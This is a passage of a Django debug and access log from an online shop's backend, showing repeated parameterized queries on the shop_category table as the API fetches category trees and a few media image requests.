"shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 13:25:42,077 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 13:25:42,080 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 13:25:42,082 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 13:25:42,085 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 13:25:42,087 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 13:25:42,090 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 13:25:42,092 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 13:25:42,095 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 13:25:42,097 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 13:25:42,100 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 13:25:42,102 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 13:25:42,107 utils 11259 139831552767744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 13:25:42,110 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 13:25:42,112 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 13:25:42,114 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 13:25:42,117 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 13:25:42,119 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 13:25:42,122 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 13:25:42,125 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 13:25:42,128 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 13:25:42,130 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 13:25:42,133 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 13:25:42,136 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 13:25:42,141 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 13:25:42,144 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 13:25:42,148 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 13:25:42,151 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 13:25:42,155 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 13:25:42,158 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 13:25:42,161 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 13:25:42,164 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 13:25:42,167 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 13:25:42,170 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 13:25:42,173 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 13:25:42,176 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 13:25:42,179 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 13:25:42,182 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 13:25:42,185 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 13:25:42] "GET /api/v1/categories/ HTTP/1.0" 200 8596 [13/Dec/2019 13:25:42] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 200 284188 [13/Dec/2019 13:25:42] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 200 284188 DEBUG 2019-12-13 13:26:06,049 utils 11259 139831552767744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:26:06,058 utils 11259 139831317362432 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 13:26:06,064 utils 11259 139831552767744 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 13:26:06,067 utils 11259 139831317362432 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 13:26:06,072 utils 11259 139831552767744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 13:26:06,077 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 13:26:06,081 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 13:26:06,086 utils 11259 139831552767744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) [13/Dec/2019 13:26:06] "GET /api/v1/categories/6 HTTP/1.0" 200 192 DEBUG 2019-12-13 13:26:06,090 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 13:26:06,094 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 13:26:06,098 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 13:26:06,103 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 13:26:06,107 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 13:26:06,111 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 13:26:06,114 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 13:26:06,118 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 13:26:06,123 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 13:26:06,127 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 13:26:06,131 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 13:26:06,134 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 13:26:06,139 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 13:26:06,141 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 13:26:06,144 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 13:26:06,146 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 13:26:06,148 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 13:26:06,151 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 13:26:06,153 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 13:26:06,155 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 13:26:06,158 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", 